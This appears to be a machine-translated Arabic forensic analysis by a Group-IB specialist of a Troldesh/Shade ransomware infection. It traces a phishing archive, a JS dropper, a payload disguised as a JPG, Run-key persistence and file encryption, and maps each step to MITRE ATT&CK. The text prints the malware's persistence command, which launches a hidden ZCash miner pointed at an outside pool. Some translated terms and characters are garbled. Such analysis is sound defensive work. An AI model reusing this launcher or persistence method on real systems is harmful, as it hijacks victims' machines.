إذا تابعت
الأخبار ، فمن المحتمل أن تكون على علم بشن هجوم جديد واسع النطاق على الشركات الروسية لفيروس Troldesh ransomware (Shade) ، وهو أحد أكثر برامج تشفير التشفير شيوعًا بين مجرمي الإنترنت. في يونيو وحده ، اكتشفت Group-IB أكثر من 1100 رسالة بريد إلكتروني تصيّد من Troldesh تم إرسالها بالنيابة عن موظفي شركات الطيران الكبرى وتجار السيارات ووسائل الإعلام.
في هذه المقالة ، سوف نلقي نظرة على القطع الأثرية التي يمكن العثور عليها بعد هجوم Shade / Troldesh على وسائط جهاز مخترق ، وكذلك مقارنة التكتيكات والتقنيات المستخدمة من قبل المهاجمين مع MITER ATT & CK.
بقلم
أوليغ سكولكين ، اختصاصي الأدلة الجنائية في Group-IB
Troldesh ، المعروف أيضًا باسم Shade و XTBL و Trojan.Encoder.858 و Da Vinci و No_more_ransome ، هو فيروس يقوم بتشفير الملفات على جهاز مستخدم مصاب ويتطلب فدية لاستعادة الوصول إلى المعلومات. لقد أظهرت الحملات الأخيرة مع Troldesh أنه الآن لا يقوم فقط بتشفير الملفات ، ولكن أيضًا منجم عمال المناجم المشفرة ويولد حركة مرور إلى مواقع الويب لزيادة حركة المرور والإيرادات من الإعلانات عبر الإنترنت.
في المرة الأولى التي اكتشف فيها خبراء Group-IB نشاط Troldesh في عام 2015 ، لاحظوا أن الفيروس قد اجتاز بنجاح أدوات الحماية من الفيروسات. قام المهاجمون بتغيير "packer" بانتظام - وهو برنامج packer يقلل من حجم الملف ويجعل من الصعب اكتشافه وعكسه - وبسبب هذا ، غالبًا ما تخطته برامج مكافحة الفيروسات. بحلول نهاية عام 2018 ، أصبحت Troldesh واحدة من أكثر الفيروسات شعبية ودخلت بثقة أعلى 3 ، جنبا إلى جنب مع RTM و Pony. أفاد خبراء PaloAlto Networks بأن Troldesh لا يعمل فقط للأغراض الروسية - من بين البلدان المتأثرة بفدية الفدية هي الولايات المتحدة واليابان والهند وتايلاند وكندا.
ناقل العدوى الأولي
عادةً ما يتم توزيع "Troldesh / Shade" عبر رسائل البريد الإلكتروني المخادعة مع مرفقات ضارة ، على سبيل المثال ، المحفوظات المحمية بكلمة مرور التي تحتوي على ملفات JS ضارة ، بعد الفتح يتم تنزيل cryptolocker وإطلاقه. ماذا يعني هذا؟ سيكون من الجيد أن نبدأ دراستنا عن طريق تحليل آثار فتح هذه المحفوظات. أين يمكن العثور على هذه الآثار؟ حسنًا ، على سبيل المثال ، في قوائم الانتقال السريع:
البيانات المستخرجة من ملف 5f7b5f1e01b83767.automaticDestinations-ms باستخدام JLECmd
لذلك ، نرى أن المستخدم قد فتح الأرشيف باسم "password 11.rar حول الطلب". ولكن كيف دخل النظام؟ يوجد الملف في دليل التنزيلات ، على الأرجح تم تنزيله من الإنترنت. دعنا نلقي نظرة على سجل المتصفح:
البيانات المستخرجة من ملف WebCache01.dat باستخدام مركز أدلة Belkasoft
كما ترى ، تم تنزيل الملف باستخدام مستعرض الويب الخاص بـ Microsoft Edge وحفظه في دليل التنزيلات. علاوة على ذلك ، وقبل التنزيل مباشرة ، قام المستخدم بزيارة موقع البريد الإلكتروني ، وبالتالي ، تم استلام الأرشيف عبر البريد الإلكتروني.
وبالتالي ، فإننا نتعامل مع الأسلوب الأكثر شيوعًا: T1193 - "Spearphishing Attachment".
بدء وتجاوز آليات الحماية
إذا نظرنا داخل الأرشيف ، فسنجد ملف JS يحمل اسمًا متطابقًا تقريبًا. لكي يتم تحميل البرامج الضارة وبدء العمل ، يجب على المستخدم النقر نقرًا مزدوجًا على الملف المحدد. بعد ذلك ، يقوم "wscript.exe" بإطلاق ملف JS ، والذي سيقوم بتنزيل الملف الضار من
mat.tradetoolsfx [.] Com وتشغيله. يمكن أن نجد أي آثار لهذا على القرص؟ بالطبع!
دعونا نلقي نظرة على ملف الجلب المسبق wscript.exe ، مع التركيز على الملفات التي تفاعل معها:
<...>
\ المجلد {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ تفاصيل الطلب A.JS
<...>
لذلك ، لدينا ملفين للاهتمام. أولاً ، نحن نعرف الآن اسم ملف JS الذي كان في الأرشيف ، وثانياً ، اكتشفنا اسم الملف الذي تم تنزيله. حان الوقت لمعرفة مكان تنزيله منه. دعنا نلقي نظرة على WebCache01.dat مرة أخرى:
تم استرداد البيانات من WebCache01.dat باستخدام ESEDatabaseView
إذا قمنا بفك تشفير محتويات حقل ResponseHeaders ، فسنحصل على ما يلي:
HTTP / 1.1 200 موافق
نوع المحتوى: image / jpeg
طول المحتوى: 1300656
ETag: "5ced19b6-13d8b0"
أمان صارم - النقل: الحد الأقصى للعمر = 31536000 ؛
في الواقع ، هذا ليس ملف JPG ، ولكنه ملف قابل للتنفيذ يقوم بفك تشفير وتشغيل مثيل Shade.
فما التقنيات التي نتعامل معها هنا؟ البرمجة النصية (T1064) ، تنفيذ المستخدم (T1204) ، و Masquerading (T1036).
دبوس النظام
يستخدم "Shade" طريقة تافهة إلى حد ما لإصلاح النظام - مفتاح التسجيل "Software \ Microsoft \ Windows \ CurrentVersion \ Run" (T1060). نحن نعلم بالفعل أن ملف JS الضار تم فتحه بواسطة المستخدم "0136" ، لذلك ألق نظرة على الملف المقابل "NTUSER.DAT":
آلية القفل في النظام التي اكتشفها مركز أدلة Belkasoft
لكن هذا ليس كل شيء! مزيد من أكثر إثارة للاهتمام:
آلية القفل في النظام التي اكتشفها مركز أدلة Belkasoft
كما ترون في الرسم التوضيحي ، هناك إدخال آخر مثير للاهتمام يشير إلى C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. دعونا نرى ما هو داخل هذا الملف:
echo CreateObject ("Wscript.Shell"). تشغيل "" ^ & WScript.Arguments (0) ^ & ""، 0، False> "٪ TEMP٪ / pxNXSB.vbs" && start / WAIT wscript.exe "٪ TEMP٪ /pxNXSB.vbs "" C: \ Users \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281٪ TEMP٪ \ pxNXSB.vbs "
لذلك ، لدينا ملف واحد آخر. اذا حكمنا من خلال محتوياته ، يتم استخدامه من قبل المهاجمين لاستخراج عملة التشفير ZCash. وبالتالي ، حتى إذا دفعت الضحية الفدية ، فإن موارد نظامها ستظل تستخدم من قبل المتسللين.
العواقب
بادئ ذي بدء ، "Shade" عبارة عن cryptoclocker ، لذا فإن أول ما يلفت انتباهك هو وجود الكثير من الملفات ذات الامتداد "CRYPTED000007" ، و "Read Me" ، وكذلك خلفيات "حديثة" على سطح مكتبك:
يمكن العثور على ملف بهذه الصورة في الدليل C: \ Users \٪ username٪ \ AppData \ Roaming. ما المعدات التي نتعامل معها؟ "البيانات المشفرة للتأثير" (T1486).
ولكن ، كما فهمت بالفعل ، "الظل" ليس خزانة تشفير عادية. بالإضافة إلى cryptoclocker نفسها ، وجدنا أيضًا عامل منجم ، مما يعني أنه يجدر ذكر تقنية أخرى - "Resource Hijacking".
MITER ATT & CK
كشف تحليلنا عن عدد من الأساليب والتقنيات لموزعي الظل ، دعونا نلخص: